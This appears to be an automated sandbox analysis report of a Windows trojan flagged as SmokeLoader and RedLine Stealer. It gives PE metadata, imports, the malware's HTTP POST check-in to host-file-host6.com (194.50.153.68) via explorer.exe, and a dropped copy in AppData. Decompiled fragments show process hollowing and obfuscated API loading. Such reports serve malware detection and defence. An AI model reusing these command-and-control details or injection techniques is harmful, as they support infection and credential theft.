              SHA512:72cb4a67885c7e2167f98365f209fb0f757fb978acbb55099d5a8b768dde4158071df3bd6d6cd808255a45ffe24040d86715a673eaeb386b1412918b2c65dded
              SSDEEP:3072:X6JOiohJ19MbvuzdRE45nLtn5gFTti91:yOiY9T10FTti
              TLSH:F154185382A13C55EA668B768E1FC6F8761EB6718F5D3769321CBA1F08B00B2D173B11
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&...b...b...b...|.......|.......|...H...EX..k...b.......|...c...|...c...|...c...Richb...................PE..L.... Ib...........
              Icon Hash:554541494945691d
              Entrypoint:0x404e59
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
              Time Stamp:0x62492001 [Sun Apr 3 04:18:09 2022 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:0
              File Version Major:5
              File Version Minor:0
              Subsystem Version Major:5
              Subsystem Version Minor:0
              Import Hash:2d9ed3462f8a74bfd1231e2e9de56b43
              Instruction
              call 00007F66CCCE3613h
              jmp 00007F66CCCDECADh
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              int3
              mov ecx, dword ptr [esp+04h]
              test ecx, 00000003h
              je 00007F66CCCDEE56h
              mov al, byte ptr [ecx]
              add ecx, 01h
              test al, al
              je 00007F66CCCDEE80h
              test ecx, 00000003h
              jne 00007F66CCCDEE21h
              add eax, 00000000h
              lea esp, dword ptr [esp+00000000h]
              lea esp, dword ptr [esp+00000000h]
              mov eax, dword ptr [ecx]
              mov edx, 7EFEFEFFh
              add edx, eax
              xor eax, FFFFFFFFh
              xor eax, edx
              add ecx, 04h
              test eax, 81010100h
              je 00007F66CCCDEE1Ah
              mov eax, dword ptr [ecx-04h]
              test al, al
              je 00007F66CCCDEE64h
              test ah, ah
              je 00007F66CCCDEE56h
              test eax, 00FF0000h
              je 00007F66CCCDEE45h
              test eax, FF000000h
              je 00007F66CCCDEE34h
              jmp 00007F66CCCDEDFFh
              lea eax, dword ptr [ecx-01h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              lea eax, dword ptr [ecx-02h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              lea eax, dword ptr [ecx-03h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              lea eax, dword ptr [ecx-04h]
              mov ecx, dword ptr [esp+04h]
              sub eax, ecx
              ret
              mov edi, edi
              push ebp
              mov ebp, esp
              sub esp, 20h
              mov eax, dword ptr [ebp+08h]
              push esi
              push edi
              push 00000008h
              pop ecx
              mov esi, 004012D8h
              lea edi, dword ptr [ebp-20h]
              rep movsd
              mov dword ptr [ebp-08h], eax
              mov eax, dword ptr [ebp+0Ch]
              pop edi
              mov dword ptr [ebp-04h], eax
              pop esi
              Programming Language:
              • [ASM] VS2008 build 21022
              • [ C ] VS2008 build 21022
              • [C++] VS2008 build 21022
              • [IMP] VS2005 build 50727
              • [RES] VS2008 build 21022
              • [LNK] VS2008 build 21022
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x287f80x64.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x2700000x19398.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x28a0000xddc.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x12200x1c.text
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x31500x40.text
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d4.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x282ba0x28400False0.7868788819875776data7.581715328183715IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .data0x2a0000x2458440x1e00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x2700000x193980x19400False0.37933168316831684data4.266178948669026IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0x28a0000x33380x3400False0.22581129807692307data2.522522475741166IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountry
              RT_ICON0x2707300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
              RT_ICON0x2715d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
              RT_ICON0x271e800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
              RT_ICON0x2744280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
              RT_ICON0x2754d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
              RT_ICON0x2759880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
              RT_ICON0x2768300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
              RT_ICON0x2770d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
              RT_ICON0x2776400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
              RT_ICON0x279be80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
              RT_ICON0x27ac900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0
              RT_ICON0x27b6180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
              RT_ICON0x27bae80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
              RT_ICON0x27c9900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
              RT_ICON0x27d2380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0
              RT_ICON0x27d9000x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
              RT_ICON0x27de680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
              RT_ICON0x2804100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
              RT_ICON0x2814b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
              RT_ICON0x2819880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
              RT_ICON0x2828300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
              RT_ICON0x2830d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
              RT_ICON0x2836400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
              RT_ICON0x285be80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
              RT_ICON0x286c900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0
              RT_ICON0x2876180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0
              RT_STRING0x287d200x664data
              RT_STRING0x2883880x59edata
              RT_STRING0x2889280x29adata
              RT_STRING0x288bc80x248data
              RT_STRING0x288e100x582data
              RT_GROUP_ICON0x287a800x68data
              RT_GROUP_ICON0x2759380x4cdata
              RT_GROUP_ICON0x2819200x68data
              RT_GROUP_ICON0x27ba800x68data
              RT_VERSION0x287ae80x238data
              DLLImport
              KERNEL32.dllGetModuleHandleW, IsBadReadPtr, GetConsoleAliasesLengthA, WaitForMultipleObjectsEx, GetPrivateProfileIntA, FreeConsole, GetVersionExW, WritePrivateProfileStructW, MulDiv, GetModuleFileNameW, CreateActCtxA, WritePrivateProfileStringW, ReplaceFileA, GetStringTypeExA, GetStdHandle, GetLogicalDriveStringsA, OpenMutexW, GetLastError, ReadConsoleOutputCharacterA, GetProcAddress, AttachConsole, SleepEx, VirtualAlloc, _hwrite, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, GetFileType, CreateFileMappingW, FindFirstVolumeMountPointW, GetNumberFormatW, CreateEventW, GetModuleFileNameA, lstrcmpiW, GetModuleHandleA, CreateMutexA, GetFileAttributesExW, GetConsoleCursorInfo, ScrollConsoleScreenBufferA, GetCurrentThreadId, FindAtomW, EnumResourceLanguagesW, DebugBreak, FindNextVolumeA, AddConsoleAliasW, CancelWaitableTimer, GetCommState, WaitForSingleObject, GetLongPathNameA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, WideCharToMultiByte, SetHandleCount, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapReAlloc, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, HeapSize, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, FlushFileBuffers, CreateFileA, CloseHandle
              USER32.dllCharLowerBuffA
              GDI32.dllGetCharWidthW, EnumFontsW, GetCharABCWidthsFloatW
              ADVAPI32.dllMapGenericMask
              TimestampSource PortDest PortSource IPDest IP
              May 28, 2023 10:43:38.398670912 CEST4968480192.168.2.4194.50.153.68
              May 28, 2023 10:43:38.423293114 CEST8049684194.50.153.68192.168.2.4
              May 28, 2023 10:43:38.423527002 CEST4968480192.168.2.4194.50.153.68
              May 28, 2023 10:43:38.424354076 CEST4968480192.168.2.4194.50.153.68
              May 28, 2023 10:43:38.424403906 CEST4968480192.168.2.4194.50.153.68
              May 28, 2023 10:43:38.448726892 CEST8049684194.50.153.68192.168.2.4
              May 28, 2023 10:43:38.449038982 CEST8049684194.50.153.68192.168.2.4
              May 28, 2023 10:43:38.546303988 CEST8049684194.50.153.68192.168.2.4
              May 28, 2023 10:43:38.546607018 CEST4968480192.168.2.4194.50.153.68
              May 28, 2023 10:43:38.547754049 CEST4968480192.168.2.4194.50.153.68
              May 28, 2023 10:43:38.572189093 CEST8049684194.50.153.68192.168.2.4
              TimestampSource PortDest PortSource IPDest IP
              May 28, 2023 10:43:38.250626087 CEST5741753192.168.2.48.8.8.8
              May 28, 2023 10:43:38.373370886 CEST53574178.8.8.8192.168.2.4
              May 28, 2023 10:43:38.559854984 CEST5098253192.168.2.48.8.8.8
              May 28, 2023 10:43:39.579572916 CEST5098253192.168.2.48.8.8.8
              May 28, 2023 10:43:40.626518011 CEST5098253192.168.2.48.8.8.8
              May 28, 2023 10:43:42.625973940 CEST53509828.8.8.8192.168.2.4
              May 28, 2023 10:43:43.618988991 CEST53509828.8.8.8192.168.2.4
              May 28, 2023 10:43:44.670767069 CEST53509828.8.8.8192.168.2.4
              TimestampSource IPDest IPChecksumCodeType
              May 28, 2023 10:43:43.619714975 CEST192.168.2.48.8.8.8cff7(Port unreachable)Destination Unreachable
              May 28, 2023 10:43:44.673737049 CEST192.168.2.48.8.8.8cff7(Port unreachable)Destination Unreachable
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              May 28, 2023 10:43:38.250626087 CEST192.168.2.48.8.8.80x1116Standard query (0)host-file-host6.comA (IP address)IN (0x0001)false
              May 28, 2023 10:43:38.559854984 CEST192.168.2.48.8.8.80x1637Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
              May 28, 2023 10:43:39.579572916 CEST192.168.2.48.8.8.80x1637Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
              May 28, 2023 10:43:40.626518011 CEST192.168.2.48.8.8.80x1637Standard query (0)host-host-file8.comA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              May 28, 2023 10:43:38.373370886 CEST8.8.8.8192.168.2.40x1116No error (0)host-file-host6.com194.50.153.68A (IP address)IN (0x0001)false
              May 28, 2023 10:43:42.625973940 CEST8.8.8.8192.168.2.40x1637Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
              May 28, 2023 10:43:43.618988991 CEST8.8.8.8192.168.2.40x1637Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
              May 28, 2023 10:43:44.670767069 CEST8.8.8.8192.168.2.40x1637Server failure (2)host-host-file8.comnonenoneA (IP address)IN (0x0001)false
              • oncejkc.org
                • host-file-host6.com
              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.449684194.50.153.6880C:\Windows\explorer.exe
              TimestampkBytes transferredDirectionData
              May 28, 2023 10:43:38.424354076 CEST0OUTPOST / HTTP/1.1
              Connection: Keep-Alive
              Content-Type: application/x-www-form-urlencoded
              Accept: */*
              Referer: http://oncejkc.org/
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Content-Length: 218
              Host: host-file-host6.com
              May 28, 2023 10:43:38.424403906 CEST0OUTData Raw: 10 87 86 99 6c 83 a6 c3 cd 3b 09 41 77 c9 e2 8e 40 63 a2 43 d8 31 69 9e ca ec ad f2 f8 d7 93 83 6c b3 54 a9 1e 6c c4 90 9c af f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 12 c7 85 29
              Data Ascii: l;Aw@cC1ilTlwmFu$f]d)C$x^_ylGDB-Hj2rm/% ON^_PS-A.6!J!f@X)&|:Kub#*A1GmmRx[9sHowIJ
              May 28, 2023 10:43:38.546303988 CEST1INHTTP/1.1 200 OK
              Server: nginx/1.20.2
              Date: Sun, 28 May 2023 08:43:38 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a
              Data Ascii: fYour IP blocked0


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Click to jump to process

              Target ID:0
              Start time:10:42:57
              Start date:28/05/2023
              Path:C:\Users\user\Desktop\01885599.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\01885599.exe
              Imagebase:0x400000
              File size:290304 bytes
              MD5 hash:A29C587C678826F4A44CF6A2A78599F1
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.530540948.00000000008E9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              Reputation:low

              Target ID:1
              Start time:10:42:57
              Start date:28/05/2023
              Path:C:\Users\user\Desktop\01885599.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\01885599.exe
              Imagebase:0x400000
              File size:290304 bytes
              MD5 hash:A29C587C678826F4A44CF6A2A78599F1
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.571005339.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.570947519.0000000000420000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.570947519.0000000000420000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low

              Target ID:3
              Start time:10:43:02
              Start date:28/05/2023
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Explorer.EXE
              Imagebase:0x7ff618f60000
              File size:3933184 bytes
              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:5
              Start time:10:43:39
              Start date:28/05/2023
              Path:C:\Users\user\AppData\Roaming\vbjjhwi
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\vbjjhwi
              Imagebase:0x400000
              File size:290304 bytes
              MD5 hash:A29C587C678826F4A44CF6A2A78599F1
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.622842996.00000000006B8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              • Detection: 41%, ReversingLabs
              • Detection: 37%, Virustotal, Browse
              Reputation:low

              Target ID:6
              Start time:10:43:40
              Start date:28/05/2023
              Path:C:\Users\user\AppData\Roaming\vbjjhwi
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\vbjjhwi
              Imagebase:0x400000
              File size:290304 bytes
              MD5 hash:A29C587C678826F4A44CF6A2A78599F1
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.633668542.00000000004A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.633696994.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.633696994.00000000005B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
              Reputation:low

              Reset < >
                APIs
                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 007F0156
                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 007F016C
                • CreateProcessA.KERNELBASE(?,00000000), ref: 007F0255
                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 007F0270
                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 007F0283
                • GetThreadContext.KERNELBASE(00000000,?), ref: 007F029F
                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007F02C8
                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 007F02E3
                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 007F0304
                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 007F032A
                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 007F0399
                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 007F03BF
                • SetThreadContext.KERNELBASE(00000000,?), ref: 007F03E1
                • ResumeThread.KERNELBASE(00000000), ref: 007F03ED
                • ExitProcess.KERNEL32(00000000), ref: 007F0412
                Memory Dump Source
                • Source File: 00000000.00000002.530504129.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                • String ID:
                • API String ID: 2875986403-0
                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction ID: e7e28a3bc4ea1298122236ea625666df9825257c5c089112e06cba46651a7470
                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction Fuzzy Hash: ECB1D874A00208AFDB44CF98C895FAEBBB5FF88314F248158E608AB391D775AD41CF94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 007F0533
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530504129.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                • API String ID: 716092398-2341455598
                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction ID: 5fe64e8f5abb313b45e8de706aa9d15ed9feb8ffa9a7fac16eccbdc74bc6611b
                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction Fuzzy Hash: 2C510770D0838CDAEB11CBD8C849BADBFB66F11708F144058D5446F386C7FA5669CBA6
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004037B0() {
                				long _v4;
                				struct HINSTANCE__* _t2;
                				int _t6;
                				long* _t11;
                
                				_t2 = GetModuleHandleW(L"kernel32.dll");
                				 *0x667f54 = _t2;
                				 *0x42c718 = 0x56;
                				 *0x42c719 = 0x69;
                				 *0x42c71a = 0x72;
                				 *0x42c71f = 0x50;
                				 *0x42c725 = 0x74;
                				 *0x42c726 = 0;
                				 *0x42c71b = 0x74;
                				 *0x42c71c = 0x75;
                				 *0x42c71d = 0x61;
                				 *0x42c71e = 0x6c;
                				 *0x42c720 = 0x72;
                				 *0x42c721 = 0x6f;
                				 *0x42c722 = 0x74;
                				 *0x42c723 = 0x65;
                				 *0x42c724 = 0x63;
                				 *0x667ecc = GetProcAddress(_t2, "msimg32.dll");
                				 *_t11 = 0x20;
                				 *_t11 =  *_t11 + 0x20;
                				_t6 = VirtualProtect( *0x667ed4,  *0x667f64,  *_t11,  &_v4); // executed
                				return _t6;
                			}







                0x004037b8
                0x004037c8
                0x004037cd
                0x004037d4
                0x004037db
                0x004037e1
                0x004037e8
                0x004037ee
                0x004037f5
                0x004037fb
                0x00403802
                0x00403809
                0x00403810
                0x00403816
                0x0040381d
                0x00403823
                0x0040382a
                0x00403837
                0x0040383c
                0x00403843
                0x0040385d
                0x00403866

                APIs
                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004037B8
                • GetProcAddress.KERNEL32(00000000,msimg32.dll), ref: 00403831
                • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0040385D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: AddressHandleModuleProcProtectVirtual
                • String ID: kernel32.dll$msimg32.dll
                • API String ID: 2099061454-2650206847
                • Opcode ID: 0d811558b14423d52be23d3299fddabb9446746047720549f389ee5351b5ed6a
                • Instruction ID: d2ff6a618dc73a123dea7d8d4395d4ada67506c9c5264332cea3ef214b102018
                • Opcode Fuzzy Hash: 0d811558b14423d52be23d3299fddabb9446746047720549f389ee5351b5ed6a
                • Instruction Fuzzy Hash: AF11F1642083C2DED721D728BDC875A3F9597A9749F8440A9D08447262C7F6051ACFBF
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 007F05EC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530504129.00000000007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                Similarity
                • API ID: AttributesFile
                • String ID: apfHQ$o
                • API String ID: 3188754299-2999369273
                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction ID: ee9d201d0ce852539d4d7fced12a88faf034fafae0826f8e914c2f50d66b5ab5
                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction Fuzzy Hash: 13011E70C0424CEADB10DBA8C5187AEBFB5AF41308F148099D5196B342D7BA9B59CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004033B0() {
                				struct HINSTANCE__* _t2;
                
                				 *0x42c721 = 0x6c;
                				 *0x42c71b = 0x6d;
                				 *0x42c71a = 0x69;
                				 *0x42c71c = 0x67;
                				 *0x42c720 = 0x64;
                				 *0x42c723 = 0;
                				 *0x42c71d = 0x33;
                				 *0x42c719 = 0x73;
                				 *0x42c722 = 0x6c;
                				 *0x42c71f = 0x2e;
                				 *0x42c71e = 0x32;
                				 *0x42c718 = 0x6d; // executed
                				_t2 = LoadLibraryA("msimg32.dll"); // executed
                				return _t2;
                			}




                0x004033b9
                0x004033bf
                0x004033c4
                0x004033cb
                0x004033d2
                0x004033d9
                0x004033e0
                0x004033e7
                0x004033ee
                0x004033f4
                0x004033fb
                0x00403402
                0x00403407
                0x0040340d

                APIs
                • LoadLibraryA.KERNELBASE(msimg32.dll), ref: 00403407
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: LibraryLoad
                • String ID: msimg32.dll
                • API String ID: 1029625771-3287713914
                • Opcode ID: 052bd5629aa5f6efc2bd6ca4a2e95cfa120a0717947de44c5af84ff10b049836
                • Instruction ID: 05c7abdfc87ea11d598c798ceb984ce779f81a856509e5d291aaa7487a89636c
                • Opcode Fuzzy Hash: 052bd5629aa5f6efc2bd6ca4a2e95cfa120a0717947de44c5af84ff10b049836
                • Instruction Fuzzy Hash: C3F09E1074D2C2C9D722876878C97482E9583B6688F8840A9C08007263C7EA021BDFBF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040960C(intOrPtr _a4) {
                				void* _t6;
                
                				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                				 *0x42c0fc = _t6;
                				if(_t6 != 0) {
                					 *0x66e6e4 = 1;
                					return 1;
                				} else {
                					return _t6;
                				}
                			}




                0x00409621
                0x00409627
                0x0040962e
                0x00409635
                0x0040963b
                0x00409631
                0x00409631
                0x00409631

                APIs
                • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00404D4E,00000001), ref: 00409621
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: CreateHeap
                • String ID:
                • API String ID: 10892065-0
                • Opcode ID: 4e566d3bbde630351fb88045bf3d1e435b9961cf4413c9b4116b65a3c9ce0f13
                • Instruction ID: d28284ccdbbdcaf187e3bec61d816bcb561cddc8946e21138a7cab5a088a3787
                • Opcode Fuzzy Hash: 4e566d3bbde630351fb88045bf3d1e435b9961cf4413c9b4116b65a3c9ce0f13
                • Instruction Fuzzy Hash: 8CD0A736694745DEDB109FB5BD09B663BDCD384395F00C436F91DD6290F5B5C981CA08
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004090E1() {
                				void* _t1;
                
                				_t1 = E0040906F(0); // executed
                				return _t1;
                			}




                0x004090e3
                0x004090e9

                APIs
                • __encode_pointer.LIBCMT ref: 004090E3
                  • Part of subcall function 0040906F: TlsGetValue.KERNEL32(00000000,?,004090E8,00000000,0040D6C0,0042BCC8,00000000,00000314,?,00408984,0042BCC8,Microsoft Visual C++ Runtime Library,00012010), ref: 00409081
                  • Part of subcall function 0040906F: TlsGetValue.KERNEL32(00000005,?,004090E8,00000000,0040D6C0,0042BCC8,00000000,00000314,?,00408984,0042BCC8,Microsoft Visual C++ Runtime Library,00012010), ref: 00409098
